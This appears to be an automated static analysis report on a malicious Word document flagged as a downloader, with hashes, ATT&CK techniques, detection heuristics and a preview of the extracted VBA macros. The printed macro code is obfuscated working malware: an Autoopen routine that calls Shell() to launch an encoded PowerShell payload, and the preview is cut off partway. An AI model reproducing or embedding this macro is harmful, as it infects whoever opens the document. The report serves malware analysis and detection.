Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 96d4e7863fa8741f…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 104.2 KB
Created: 2018-06-11 13:46:00
Authoring application: Microsoft Office Word
First seen: 2018-07-14
MD5: 3a6dd2fc04f56755adecf8b41ab54b27
SHA-1: cdebb3bda1477ab713c2df6eba25f624a8923653
SHA-256: 96d4e7863fa8741f84d1ee5b5358fd65af2e042311c4708bcc87da28dbbaceb1
Risk score: 242

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1059 Command and Scripting Interpreter
  • T1204.002 Malicious File

The sample is a malicious Office document containing VBA macros. The Autoopen macro triggers execution of a second-stage payload through the Shell() function. The ClamAV detection name 'Doc.Downloader.Valyria-6595163-0' strongly suggests downloader functionality.

Heuristics (7)

  • ClamAV: Doc.Downloader.Valyria-6595163-0 [critical, CLAMAV_DETECTION]
    ClamAV detected this file as malware: Doc.Downloader.Valyria-6595163-0
  • VBA macros detected [medium, 3 related findings, OLE_VBA_MACROS]
    Document contains VBA macro code
  • Shell() call in VBA [critical, OLE_VBA_SHELL]
    Shell() call in VBA
  • AutoOpen macro [high, OLE_VBA_AUTOOPEN]
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens [high, OLE_VBA_PCODE_AUTOEXEC_EXEC]
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches macro documents that are p-code-only or whose source extraction failed, where no visible source is available.
  • Legacy WordBasic auto-exec macro marker [medium, OLE_LEGACY_WORDBASIC_AUTOEXEC]
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence of an old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info, EMBEDDED_URL]
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (found in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 11101 bytes
SHA-256: 25c759c649ef187dc8c79b64c6c78082c931d495057120548d4215c991b06c82

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "XTpBcmRzpR"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function CVIvjTsH()
On Error Resume Next
nGkZO = CLng(88679 * CSng(NdIPKc + ChrB(umoOb + CInt(390))))
LCkXV = Int(TsiRki)
jRTnzR = OBGVmt
QCLpD = ubDzBt
MVuqf = zRdSBP
OJJwP = bmDpXc
CkHNTl = CLng(11797 * CSng(ZsGPq + ChrB(vonkJ + CInt(50829))))
NkRHkQ = Int(PJjXO)
dNJPwQ = tpQDj
ifzPF = Bopzp
jUnAQ = jBsci
XlsRzX = ObLmm
CVIvjTsH = bvqUYB + Shell(PErvNWZ + Chr(nVkDNzAnG + vbKeyP + RpTXcRuz) + "owers" + AzlDTiqBI + iwforpUi + QuhVXCzZJdY + zozHmPvK + bCwOiwjWrtu, 53622 - 53622)
tbJMJ = CLng(76423 * CSng(TJPwU + ChrB(YDTfjB + CInt(94207))))
rTVko = Int(fbfXi)
iWlao = pULOWw
FwQvvi = pwBHnc
Visir = TKCRt
wMcHdz = niTOf
End Function
Sub Autoopen()
On Error Resume Next
tzLjVi = CLng(73730 * CSng(NTmSk + ChrB(icvwwB + CInt(9872))))
YNrYJO = Int(mCTMvw)
IahnH = lsppsS
KnWPii = YwswU
WaQSF = jRUUPL
avfXCf = YdwjEi
CVIvjTsH
lsJik = CLng(36657 * CSng(IKcWjD + ChrB(ZqTGEj + CInt(7729))))
taqQd = Int(sckOWY)
ZKmisK = kDBSc
znfZA = MTwjrU
kPhrIM = rzfhbL
mjqYX = YzFzKO
End Sub


Attribute VB_Name = "LbaauKCZCC"
Function AzlDTiqBI()
On Error Resume Next
SKPKw = CLng(67149 * CSng(SlwrXG + ChrB(FpZcj + CInt(96366))))
OPfsm = Int(QsXHZ)
dRmzD = qKzELb
pRnfw = HCuEv
SJLjaO = RzctSr
spnXK = DVwFc
bAbtI = "HeLL -e" + " J" + "gAgACg" + "AIAAkAHMAaA" + "BFAGwATABJAG" + "QAWwAxAF" + "0AK"
bFSVi = CLng(24863 * CSng(NkafbY + ChrB(UJWMYV + CInt(76796))))
JROXt = Int(jzNFGO)
mziujb = lRKMwU
uwkhHY = vAGLT
jnNZU = DhKsS
tKnsHC = ZHmwc
ETviXBnK = "wAkAHMASABFA" + "Gw" + "ATABpA" + "GQAWwAxADMAX" + "QArACcAeAA" + "nACkAKAAgAE4A" + "ZQ" + "B3A" + "C0" + "Abw"
wpkrw = CLng(44689 * CSng(NawwEk + ChrB(nQBjGS + CInt(81399))))
OODtE = Int(tsupkB)
VTqMV = iSNpnW
lIFDr = hkaWn
SwTiC = TjVRz
WkjMv = YPXtA
CBiEZXaV = "BiAGoARQBj" + "AFQAIAAgAE" + "kATwAuAGMAbwBt" + "AHAAcg" + "BFAFMAUwB" + "pAE8ATgAuAEQAR"
nrzaTl = CLng(90522 * CSng(CHCnKk + ChrB(jUmpT + CInt(20822))))
jGbVpY = Int(YhZvhu)
LsPjW = HPivB
qsvlD = asKqzw
WAiacr = pzUbWF
KmRYfT = iEdvWO
IbjDH = "QBGAEwAYQB0" + "AEUAcwBUAHI" + "AZQBBAE0AKAB" + "bAGkAb" + "wAuAE0ARQBNA" + "G8AUgB5AH" + "MAdABSAGUAY" + "QBNAF0AWwBDAG8A" + "TgBWAGUAUgB0AF" + "0AOgA6A"
BAUtR = CLng(77578 * CSng(zdoFD + ChrB(UrYUO + CInt(95192))))
QGtSUi = Int(ovAiG)
VnzzhF = wKIcS
uKqjJh = irvGC
mXMEc = zaDjr
mJfnF = RzsjFz
GPOHwiq = "EYAUgB" + "vAG0AYgBhAFMA" + "ZQA2" + "ADQAU" + "wBUAHIASQBOA" + "GcAKAAnAFYAWgB"
rzhzi = CLng(84837 * CSng(wIStkG + ChrB(SSBqiw + CInt(14683))))
Ysrlw = Int(CjDSPo)
MSbZow = irmDwQ
jrtbwI = YoHst
ubPbV = vFAZR
zjshGo = hpVpJr
DqnawLAtw = "CAHYAVAA4A" + "EoAQQ" + "BEAE0AY" + "QAvAHkAcgAxA" + "FkA" + "cw" + "BoAEgAZABEAF"
jQodT = CLng(63543 * CSng(uhCbLi + ChrB(VtfRbk + CInt(97214))))
criTFL = Int(YmFjE)
fRXGkv = wpFuG
MwpXh = SEnwv
bjjJQW = duqcIL
ptdmmn = zzSiO
iTuwKTwUt = "IA" + "RQAwA" + "HMA" + "SgB"
cmhrU = CLng(53789 * CSng(ILZpZ + ChrB(TcKVTh + CInt(22660))))
RYaBKI = Int(bjOaBz)
rNzIjF = dUnNDU
odwADh = NGpJT
hcLOX = UlzWLA
HnEmo = oBmFP
DLntl = "pAGcAaQ" + "BJAEkAUgBJAF" + "IAawBHAE4AQw" + "BiAG0" + "ARwBJAFUAZAA3A" + "E8ANwBtAHIAZAB"
AzlDTiqBI = bAbtI + ETviXBnK + CBiEZXaV + IbjDH + GPOHwiq + DqnawLAtw + iTuwKTwUt + DLntl
End Function
Function iwforpUi()
On Error Resume Next
wSndG = CLng(17887 * CSng(MlABJZ + ChrB(TAzrHm + CInt(480))))
ZYITBB = Int(SvWvoY)
jHrMN = VGlvNw
oBvwdZ = sOUmH
hSFfNk = CTrzu
MbTmN = DNrRA
UJwYlv = "2ADQ" + "ARQA3ADYANw" + "BoADAANABTADMAe" + "gB" + "SAHA" + "AbgAxAC"
SPWYR = CLng(75667 * CSng(FQGCB + ChrB(ichlU + CInt(18456))))
DDNaZc = Int(jDiqB)
HvVud = EvpIG
SjfdV = WHFUOB
zpjYBh = BvwmH
ITFzOv = CHwcC
WZanjrm = "8ANwB" + "0AEwAV" + "QA2AFAA" + "SAA4AFYAagArA" + "FMARw"
GTtznj = CLng(38156 * CSng(iMYWnb + ChrB(XWhsWi + CInt(38666))))
CFFTu = Int(rsDWTa)
IwLFnp = HjdaTQ
lPj
... (truncated)